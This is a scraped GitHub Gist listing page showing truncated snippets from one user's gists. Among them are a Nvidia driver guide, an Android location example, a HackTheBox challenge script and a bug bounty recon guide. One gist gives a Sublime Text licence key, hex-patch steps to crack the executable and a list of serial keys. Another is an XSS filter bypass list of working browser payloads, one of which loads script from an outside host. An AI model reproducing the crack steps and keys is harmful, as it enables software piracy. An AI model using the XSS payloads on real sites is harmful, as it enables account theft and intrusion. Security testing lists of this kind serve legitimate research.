Skip to content

Instantly share code, notes, and snippets.

@HasnSobhy
HasnSobhy / nvidia_drivers_ubuntu.txt
Created October 10, 2022 00:27 — forked from gallg/nvidia_drivers_ubuntu.txt
install nvidia drivers for optimus GPU (Ubuntu)
# Nvidia drivers for optimus GPU;
How to install Nvidia drivers and configure bumblebee on Ubuntu 16.04 with optimus GPU.
It doesn't work with Ubuntu 18+ (I recommend manual switch between GPU in this case).
Tested on Ubuntu 16.04 with Geforce GT 750m and Intel HD graphic
_______________________________________________________________________________________________________________
- Step 1: remove all video drivers;
sudo apt-get remove --purge nvidia* bumblebee* xserver-xorg-video-nouveau
@HasnSobhy
HasnSobhy / build4123.sublime4.key
Created October 8, 2022 20:09
Sublime Text 4 License Key
—– BEGIN LICENSE —–
Mifeng User
Single User License
EA7E-1184812
C0DAA9CD 6BE825B5 FF935692 1750523A
EDF59D3F A3BD6C96 F8D33866 3F1CCCEA
1C25BE4D 25B1C4CC 5110C20E 5246CC42
D232C83B C99CCC42 0E32890C B6CBF018
B1D4C178 2F9DDB16 ABAA74E5 95304BEF
9D0CCFA9 8AF8F8E2 1E0A955E 4771A576
> * Go to [hexed.it](https://hexed.it/)
> * Click "Open File" and choose your sublime_text.exe **(DON'T FORGET TO BACKUP YOUR EXE FILE)**
> * Go to Search and in "Search for" put: C3 C6 01 00 C3
> * In Search Type select "Enable replace" and put: C3 C6 01 01 C3
> * Click "Find next" then "Replace"
> * Do the same thing with: 51 31 C0 88 05 => 51 b0 01 88 05
> * Click "Save as" then name it: sublime_text
> * Copy your modified sublime_text.exe to directory Sublime Text
Serial Keys:
FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
GV7N2-DQZ00-4897Y-27ZNX-NV0TD
YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
GZ3N0-6CX0L-H80UP-FPM59-NKAD4
YY31H-6EYEJ-480VZ-VXXZC-QF2E0
ZG51K-25FE1-H81ZP-95XGT-WV2C0
VG30H-2AX11-H88FQ-CQXGZ-M6AY4
@HasnSobhy
HasnSobhy / emdeefive.py
Created April 1, 2020 01:41 — forked from rarecoil/emdeefive.py
Emdee five for life (HackTheBox Web Challenge)
import requests
import hashlib
URI = "http://docker.hackthebox.eu:35596"
PROXIES = {} # {'http':'http://127.0.0.1:8080'}
def get_and_hash(ret):
begin = ret.find("<h3 align='center'>") + 19
end = ret.find("</h3>")
md5_string = ret[begin:end].encode('utf-8')
#!/bin/bash
# bash generate random alphanumeric string
#
# bash generate random 32 character alphanumeric string (upper and lowercase) and
NEW_UUID=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1)
# bash generate random 32 character alphanumeric string (lowercase only)
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1
@HasnSobhy
HasnSobhy / WAHH_Task_Checklist.md
Last active December 3, 2019 20:06 — forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
@HasnSobhy
HasnSobhy / xxsfilterbypass.lst
Created October 14, 2019 06:37 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@HasnSobhy
HasnSobhy / github_bugbountyhunting.md
Created October 6, 2019 16:02 — forked from EdOverflow/github_bugbountyhunting.md
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@HasnSobhy
HasnSobhy / MainActivity.java
Created February 25, 2019 22:22 — forked from enginebai/MainActivity.java
Get the current location and display a marker on Google Map.
package com.enginebai.sample;
import android.content.Context;
import android.location.Location;
import android.location.LocationListener;
import android.location.LocationManager;
import android.os.Bundle;
import android.support.design.widget.FloatingActionButton;
import android.support.design.widget.Snackbar;
import android.support.v7.app.AppCompatActivity;